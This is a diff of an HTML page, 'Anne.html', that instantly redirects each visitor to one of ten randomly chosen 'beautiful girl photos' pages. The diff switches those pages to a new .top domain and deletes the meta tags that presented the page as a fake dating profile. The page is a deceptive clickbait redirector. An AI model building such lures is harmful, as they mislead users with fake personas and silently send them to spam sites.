--- a/Anne.html
+++ b/Anne.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-<!-- 16-11-2022 -->
+<!-- 08-4-2023 -->
 <!-- Google tag (gtag.js) -->
 <script async src="https://www.googletagmanager.com/gtag/js?id=G-5JB24433WX"></script>
 <script>
@@ -18,29 +18,26 @@
 <meta property="fb:app_id" content="151010854934254"/>
 
 <!-- Primary Meta Tags -->
-<title>Anne is loading...</title>
+<title>Anne Loading...</title>
 
 <!-- Open Graph / Facebook -->
 <meta property="og:type" content="website">
 <meta property="og:url" content="">
-<meta property="og:image" content="https://i.ibb.co/0j8RnCz/Anne.webp">
-<meta property="og:title" content="Anne, 25. I'm still looking for a life partner.">
-<meta property="og:description" content="💋 If you like her, let's start with a date...">
 </head>
 
 <body>
 <script>
 var linkpartner = new Array();
-linkpartner[0] = "https://photo.chiasemienphi.top/2023/03/100-beautiful-girl-photos-in-world-p1.html";
-linkpartner[1] = "https://photo.chiasemienphi.top/2023/03/100-beautiful-girl-photos-in-world-p2.html";
-linkpartner[2] = "https://photo.chiasemienphi.top/2023/03/100-beautiful-girl-photos-in-world-p3.html";
-linkpartner[3] = "https://photo.chiasemienphi.top/2023/03/100-beautiful-girl-photos-in-world-p4.html";
-linkpartner[4] = "https://photo.chiasemienphi.top/2023/03/100-beautiful-girl-photos-in-world-p5.html";
-linkpartner[5] = "https://photo.chiasemienphi.top/2023/03/100-beautiful-girl-photos-in-world-p6.html";
-linkpartner[6] = "https://photo.chiasemienphi.top/2023/03/100-beautiful-girl-photos-in-world-p7.html";
-linkpartner[7] = "https://photo.chiasemienphi.top/2023/03/100-beautiful-girl-photos-in-world-p8.html";
-linkpartner[8] = "https://photo.chiasemienphi.top/2023/03/100-beautiful-girl-photos-in-world-p9.html";
-linkpartner[9] = "https://photo.chiasemienphi.top/2023/03/100-beautiful-girl-photos-in-world-p10.html";
+linkpartner[0] = "https://chiasevip.top/2023/03/100-beautiful-girl-photos-in-world-p1.html";
+linkpartner[1] = "https://chiasevip.top/2023/03/100-beautiful-girl-photos-in-world-p2.html";
+linkpartner[2] = "https://chiasevip.top/2023/03/100-beautiful-girl-photos-in-world-p3.html";
+linkpartner[3] = "https://chiasevip.top/2023/03/100-beautiful-girl-photos-in-world-p4.html";
+linkpartner[4] = "https://chiasevip.top/2023/03/100-beautiful-girl-photos-in-world-p5.html";
+linkpartner[5] = "https://chiasevip.top/2023/03/100-beautiful-girl-photos-in-world-p6.html";
+linkpartner[6] = "https://chiasevip.top/2023/03/100-beautiful-girl-photos-in-world-p7.html";
+linkpartner[7] = "https://chiasevip.top/2023/03/100-beautiful-girl-photos-in-world-p8.html";
+linkpartner[8] = "https://chiasevip.top/2023/03/100-beautiful-girl-photos-in-world-p9.html";
+linkpartner[9] = "https://chiasevip.top/2023/03/100-beautiful-girl-photos-in-world-p10.html";
 var random = Math.floor(Math.random() *10);
 window.location.replace(linkpartner[random]);
 </script>
